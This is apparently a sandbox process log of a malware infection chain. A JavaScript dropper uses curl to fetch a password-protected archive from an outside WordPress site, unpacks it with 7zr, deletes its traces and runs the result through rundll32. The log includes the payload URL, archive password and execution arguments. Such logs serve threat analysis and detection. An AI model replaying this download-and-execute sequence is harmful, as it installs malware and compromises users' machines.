wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\convert-pdf-359.js
2544cmd.exe "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-359.js"
2640cmd.exe "C:\Windows\System32\cmd.exe" /c echo curl https://www.gentotarim.com/demo/wp-content/uploads/vvrevslider/languages/temp/1828.7z --output "C:\Users\test22\AppData\Local\Temp\laudantium.a" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\illo.g.bat"
2696curl.exe curl https://www.gentotarim.com/demo/wp-content/uploads/vvrevslider/languages/temp/1828.7z --output "C:\Users\test22\AppData\Local\Temp\laudantium.a" --ssl-no-revoke --insecure --location
2860curl.exe "C:\util\curl\curl.exe" https://www.7-zip.org/a/7zr.exe --output "C:\Users\test22\AppData\Local\Temp\enim.q"
2944cmd.exe "C:\Windows\System32\cmd.exe" /c ""C:\Users\test22\AppData\Local\Temp\enim.q" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\laudantium.a" > "C:\Users\test22\AppData\Local\Temp\illo.gconsequuntur.m""
2576enim.q "C:\Users\test22\AppData\Local\Temp\enim.q" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\laudantium.a"
2700cmd.exe "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\enim.q"
2372cmd.exe "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\laudantium.a"
2772cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\test22\AppData\Local\Temp\illo.gconsequuntur.m" "illo.g"
1304rundll32.exe "C:\Windows\System32\rundll32.exe" "C:\Users\test22\AppData\Local\Temp\illo.g", scab /k arbalet875
1892rundll32.exe "C:\Windows\System32\rundll32.exe" "C:\Users\test22\AppData\Local\Temp\illo.g", scab /k arbalet875
1736cmd.exe "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\illo.g.bat"
3048